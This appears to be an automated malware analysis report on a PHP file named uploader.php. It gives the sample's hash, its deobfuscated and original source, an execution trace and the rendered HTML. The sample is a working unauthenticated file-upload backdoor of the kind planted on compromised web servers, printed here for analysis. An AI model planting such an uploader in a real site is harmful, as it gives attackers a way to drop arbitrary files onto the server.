PHP Malware Analysis

uploader.php

md5: 7a3aa497f5e93f8e7a7a8f42ad3f0821

Deobfuscated PHP code

http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Avinash Kumar Thapa</title>
</head>
<body bgcolor="white">
<?php 
$uploaddir = '/tmp/';
// Change the directory as per the requirement
$uploadfile = $uploaddir . basename($_FILES['userfile']['name']);
if (move_uploaded_file($_FILES['userfile']['tmp_name'], $uploadfile)) {
    print "<body bgcolor=#000></br></br><div\n\nalign=center><font size=5 color=#ff0000>uploaded successfully</font></body>";
} else {
    print "<body\n\nbgcolor=#000></br></br><div align=center><font size=5 color=#ff0000Error !\n</font> <marquee> Acid </marquee> </body>";
}
?>
<div style=" color:#F00;text-align:center; margin-top:60px; font-size:25px;
">&gt;&gt;  &nbsp;  Upload Your file </div>
<div style="padding-top:75px;margin-left:450px;width:340px; height:70px;">
<form enctype="multipart/form-data" action=" " method="post">
<input name="userfile" type="file" />&nbsp;
<input type="submit" value="Upload" />
</form>
</div>
</body>
</html>

Execution traces

data/traces/7a3aa497f5e93f8e7a7a8f42ad3f0821_trace-1676248604.9709.xt
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-12 22:37:10.868756]
1	0	1	0.000196	393528
1	3	0	0.000276	396472	{main}	1		/var/www/html/uploads/uploader.php	0	0
1		A						/var/www/html/uploads/uploader.php	9	$uploaddir = '/tmp/'
2	4	0	0.000349	396472	basename	0		/var/www/html/uploads/uploader.php	10	1	NULL
2	4	1	0.000370	396536
2	4	R			''
1		A						/var/www/html/uploads/uploader.php	10	$uploadfile = '/tmp/'
2	5	0	0.000415	396472	move_uploaded_file	0		/var/www/html/uploads/uploader.php	11	2	NULL	'/tmp/'
2	5	1	0.000435	396544
2	5	R			FALSE
1	3	1	0.000455	396472
			0.000488	314352
TRACE END   [2023-02-12 22:37:10.869087]


Generated HTML code

<html xmlns="http://www.w3.org/1999/xhtml"><head></head><body bgcolor="white">http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"&gt;


<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title>Avinash Kumar Thapa</title>


<br><br><div align="center"><font size="5" color="#ff0000Error" !="" <="" font=""> <marquee> Acid </marquee> <div style=" color:#F00;text-align:center; margin-top:60px; font-size:25px;
">&gt;&gt;  &nbsp;  Upload Your file </div>
<div style="padding-top:75px;margin-left:450px;width:340px; height:70px;">
<form enctype="multipart/form-data" action=" " method="post">
<input name="userfile" type="file">&nbsp;
<input type="submit" value="Upload">
</form>
</div>


</font></div></body></html>

Original PHP code

http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Avinash Kumar Thapa</title>
</head>
<body bgcolor="white">
<?php
$uploaddir = '/tmp/'; // Change the directory as per the requirement
$uploadfile = $uploaddir . basename($_FILES['userfile']['name']);
if(move_uploaded_file($_FILES['userfile']['tmp_name'],$uploadfile)) { print '<body bgcolor=#000></br></br><div

align=center><font size=5 color=#ff0000>uploaded successfully</font></body>';
} else { print '<body

bgcolor=#000></br></br><div align=center><font size=5 color=#ff0000Error !
</font> <marquee> Acid </marquee> </body>'; }
?>
<div style=" color:#F00;text-align:center; margin-top:60px; font-size:25px;
">&gt;&gt;  &nbsp;  Upload Your file </div>
<div style="padding-top:75px;margin-left:450px;width:340px; height:70px;">
<form enctype="multipart/form-data" action=" " method="post">
<input name="userfile" type="file" />&nbsp;
<input type="submit" value="Upload" />
</form>
</div>
</body>
</html>